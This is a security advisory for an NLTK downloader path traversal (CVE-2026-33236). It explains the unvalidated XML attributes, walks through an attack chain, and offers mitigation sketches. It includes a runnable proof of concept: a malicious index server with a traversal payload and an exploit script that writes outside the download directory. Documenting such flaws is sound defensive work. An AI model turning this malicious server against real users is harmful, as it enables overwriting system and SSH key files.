PT-2026-26300 · Pypi · Nltk

Published: 2026-03-19 · Updated: 2026-03-19 · CVE-2026-33236

CVSS v3.1: 8.1 (High)
AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Vulnerability Description

The NLTK downloader does not validate the subdir and id attributes when processing remote XML index files. An attacker who controls a remote XML index server can supply values containing path traversal sequences (such as ../), which can lead to:
  1. Arbitrary Directory Creation: Create directories at arbitrary locations in the file system
  2. Arbitrary File Creation: Create files at arbitrary locations writable by the victim process
  3. Arbitrary File Overwrite: Overwrite critical files (such as /etc/passwd, ~/.ssh/authorized_keys, etc.)
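
To make the traversal concrete, here is a minimal sketch that mimics the unvalidated join described above. The helper name resolve_target and the directory /home/user/nltk_data are hypothetical and chosen only for illustration. posixpath is used so the result is the same on any platform. This is not NLTK's actual code.

```python
import posixpath

def resolve_target(download_dir, subdir, pkg_id, ext=".zip"):
    """Join attacker-influenced values the way an unvalidated downloader
    might, then normalize the path to show where the file would land."""
    filename = posixpath.join(subdir, pkg_id + ext)
    return posixpath.normpath(posixpath.join(download_dir, filename))

# A benign index entry stays inside the download directory.
benign = resolve_target("/home/user/nltk_data", "corpora", "brown")
print(benign)   # /home/user/nltk_data/corpora/brown.zip

# A hostile subdir climbs out of it.
hostile = resolve_target("/home/user/nltk_data", "../../../etc", "passwd")
print(hostile)  # /etc/passwd.zip
```

The join itself never fails: the "../" components are treated as ordinary path segments, so nothing signals that the destination has left the download directory.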

Vulnerability Principle

Key Code Locations

1. XML Parsing Without Validation (nltk/downloader.py:253)
self.filename = os.path.join(subdir, id + ext)
  • subdir and id are taken directly from XML attributes without any validation
2. Path Construction Without Checks (nltk/downloader.py:679)
filepath = os.path.join(download_dir, info.filename)
  • Directly uses filename, which may contain path traversal sequences
3. Unrestricted Directory Creation (nltk/downloader.py:687)
os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)
  • Can create arbitrary directories outside the download directory
4. File Writing Without Protection (nltk/downloader.py:695)
with open(filepath, "wb") as outfile:
  • Can write to arbitrary locations in the file system
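
One common way to guard all four locations is to resolve the final path and confirm it still lies inside the download directory before creating directories or opening files. The sketch below assumes a hypothetical helper named safe_join. It is not taken from NLTK and does not claim to reflect how the upstream fix works.

```python
import os

def safe_join(base_dir, *parts):
    """Join parts under base_dir and return the resolved path.

    Raises ValueError if the resolved path falls outside base_dir,
    for example because a part contains '../' or is absolute.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, *parts))
    # commonpath equals base only when target is base or lies below it.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes {base!r}: {target!r}")
    return target

# Hypothetical usage: the directory /srv/nltk_data need not exist.
print(safe_join("/srv/nltk_data", "corpora", "brown.zip"))
try:
    safe_join("/srv/nltk_data", "../../etc", "passwd.zip")
except ValueError as exc:
    print("rejected:", exc)
```

Checking the resolved path, rather than searching the string for "..", also covers absolute paths and symbolic links that point outside the base directory.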

Attack Chain

1. Attacker controls remote XML index server
  ↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
  ↓
3. Victim executes: downloader.download('passwd')
  ↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
  ↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
  ↓
6. os.makedirs() creates directory: download_dir + "../../etc"
  ↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
  ↓
8. A file outside the download directory is created or, if it already exists, overwritten
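
The chain above could be interrupted at step 4 by rejecting unsafe attribute values when the index is parsed. The following sketch uses the standard library's xml.etree.ElementTree. The function names and the allow-list of characters are assumptions made for illustration, not NLTK's actual validation logic.

```python
import re
import xml.etree.ElementTree as ET

# Hypothetical allow-list: letters, digits, dot, underscore, hyphen.
_SAFE_COMPONENT = re.compile(r"[A-Za-z0-9._-]+")

def is_safe_component(value):
    """True if value is a single path component with no traversal meaning."""
    return bool(_SAFE_COMPONENT.fullmatch(value)) and value not in (".", "..")

def validate_package(elem):
    """Return (id, subdir) from a <package> element, or raise ValueError."""
    pkg_id = elem.get("id", "")
    subdir = elem.get("subdir", "")
    if not is_safe_component(pkg_id):
        raise ValueError(f"unsafe package id: {pkg_id!r}")
    # subdir may be empty; otherwise every '/'-separated part must be safe.
    if subdir and not all(is_safe_component(p) for p in subdir.split("/")):
        raise ValueError(f"unsafe subdir: {subdir!r}")
    return pkg_id, subdir

good = ET.fromstring('<package id="brown" subdir="corpora"/>')
print(validate_package(good))

bad = ET.fromstring('<package id="passwd" subdir="../../etc"/>')
try:
    validate_package(bad)
except ValueError as exc:
    print("rejected:", exc)
```

Validating at parse time means later steps never see a traversal sequence. A containment check on the final path is still a useful second layer.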

Impact Scope

  1. System File Overwrite

Reproduction Steps

Environment Setup

  1. Install NLTK
pip install nltk
  2. Prepare malicious server and exploit script (see PoC section)

Reproduction Process

Step 1: Start malicious server
python3 malicious_server.py
Step 2: Run exploit script
python3 exploit_vulnerability.py
Step 3: Verify results
ls -la /tmp/test_file.zip

Proof of Concept

Malicious Server (malicious_server.py)

#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")

# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
 <packages>
  <package id="test_file" subdir="../../../../../../../../../tmp"
       url="http://127.0.0.1:8888/test.zip"
       size="100" unzipped_size="100" unzip="0"/>
 </packages>
</nltk_data>
"""

# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
  f.write(malicious_xml)

with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
  zf.writestr("test.txt", "Path traversal attack!")

# HTTP Handler
class Handler(BaseHTTPRequestHandler):
  def do_GET(self):
    if self.path == '/malicious_index.xml':
      self.send_response(200)
      self.send_header('Content-type', 'application/xml')
      self.end_headers()
      with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
        self.wfile.write(f.read())
    elif self.path == '/test.zip':
      self.send_response(200)
      self.send_header('Content-type', 'application/zip')
      self.end_headers()
      with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
        self.wfile.write(f.read())
    else:
      self.send_response(404)
      self.end_headers()

  def log_message(self, format, *args):
    # Suppress per-request logging
    pass

# Start server
if __name__ == "__main__":
  port = 8888
  server = HTTPServer(("0.0.0.0", port), Handler)
  print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
  print("Press Ctrl+C to stop")
  try:
    server.serve_forever()
  except KeyboardInterrupt:
    print("\nServer stopped")

Exploit Script (exploit_vulnerability.py)

#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile

def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
  download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
  print(f"Download directory: {download_dir}")

  # Exploit vulnerability
  from nltk.downloader import Downloader
  downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
  downloader.download("test_file", quiet=True)

  # Check results
  expected_path = "/tmp/test_file.zip"
  if os.path.exists(expected_path):
    print(f"\n✗ Exploit successful! File written to: {expected_path}")
    print("✗ Path traversal attack successful!")
  else:
    print("\n? File not found, download may have failed")

if __name__ == "__main__":
  exploit()

Execution Results

✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!

Fix

Path traversal

Weakness Enumeration

Related Identifiers

CVE-2026-33236
GHSA-469J-VMHF-R6V7

Affected Products

Nltk